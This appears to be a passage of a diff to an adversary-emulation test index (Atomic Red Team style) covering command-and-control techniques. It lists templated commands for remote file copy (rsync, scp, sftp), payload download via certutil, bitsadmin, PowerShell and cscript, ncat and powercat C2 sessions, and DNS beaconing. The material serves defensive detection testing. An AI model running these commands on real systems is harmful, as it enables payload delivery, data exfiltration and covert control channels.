name: sh
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
'
'
cleanup_command: |
unset http_proxy
unset https_proxy
@@ -28787,7 +28787,7 @@ command-and-control:
- name: Base64 Encoded data.
description: 'Utilizing a common technique for posting base64 encoded data.
'
'
supported_platforms:
- macos
- linux
@@ -28925,7 +28925,7 @@ command-and-control:
- name: rsync remote file copy (push)
description: 'Utilize rsync to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -28950,11 +28950,11 @@ command-and-control:
name: bash
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
'
'
- name: rsync remote file copy (pull)
description: 'Utilize rsync to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -28979,11 +28979,11 @@ command-and-control:
name: bash
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
'
'
- name: scp remote file copy (push)
description: 'Utilize scp to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -29008,11 +29008,11 @@ command-and-control:
name: bash
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
'
'
- name: scp remote file copy (pull)
description: 'Utilize scp to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -29037,11 +29037,11 @@ command-and-control:
name: bash
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
'
- name: sftp remote file copy (push)
description: 'Utilize sftp to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -29066,11 +29066,11 @@ command-and-control:
name: bash
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
'
'
- name: sftp remote file copy (pull)
description: 'Utilize sftp to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -29095,12 +29095,12 @@ command-and-control:
name: bash
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
'
- name: certutil download (urlcache)
description: 'Use certutil -urlcache argument to download a file from the web.
Note - /urlcache also works!
'
'
supported_platforms:
- windows
input_arguments:
@@ -29117,12 +29117,12 @@ command-and-control:
elevation_required: false
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
'
'
- name: certutil download (verifyctl)
description: 'Use certutil -verifyctl argument to download a file from the web.
Note - /verifyctl also works!
'
'
supported_platforms:
- windows
input_arguments:
@@ -29167,7 +29167,7 @@ command-and-control:
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
HIGH #{remote_file} #{local_path}
'
'
- name: Windows - PowerShell Download
description: |
This test uses PowerShell to download a payload.
@@ -29188,15 +29188,15 @@ command-and-control:
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
"#{destination_path}")
'
'
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
'
'
- name: OSTAP Worming Activity
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
This emulates the activity.
'
'
supported_platforms:
- windows
input_arguments:
@@ -29345,7 +29345,7 @@ command-and-control:
"#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}"
-QuickTimeout}
'
'
- name: DNS Regular Beaconing
description: |
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
@@ -29437,7 +29437,7 @@ command-and-control:
- name: OSTap Payload Download
description: 'Uses cscript //E:jscript to download a file
'
'
supported_platforms:
- windows
input_arguments:
@@ -29457,7 +29457,7 @@ command-and-control:
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
'
'
T1032:
technique:
x_mitre_data_sources:
@@ -29668,7 +29668,7 @@ command-and-control:
elevation_required: false
command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
'
'
- name: Powercat C2
description: "Start C2 Session Using Powercat\nTo start the listener on a Linux
device, type the following: \nnc -l -p <port>\n"
@@ -29733,7 +29733,7 @@ command-and-control:
- name: Testing usage of uncommonly used port with PowerShell
description: 'Testing uncommonly used port utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -29750,11 +29750,11 @@ command-and-control:
elevation_required: false
command: 'test-netconnection -ComputerName #{domain} -port #{port}
'
'
- name: Testing usage of uncommonly used port
description: 'Testing uncommonly used port utilizing telnet.
'
'
supported_platforms:
- linux
- macos
@@ -29772,7 +29772,7 @@ command-and-control:
elevation_required: false
command: 'telnet #{domain} #{port}
'
'
T1102:
technique:
x_mitre_permissions_required:
@@ -29839,7 +29839,7 @@ command-and-control:
- name: Reach out to C2 Pointer URLs via command_prompt
description: 'Download data from a public website using command line
'
'
supported_platforms:
- windows
executor:
@@ -29848,14 +29848,14 @@ command-and-control:
command: 'bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/
%TEMP%\bitsadmindownload.html
'
'
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
'
'
- name: Reach out to C2 Pointer URLs via powershell
description: 'Multiple download methods for files using powershell
'
'
supported_platforms:
- windows
executor: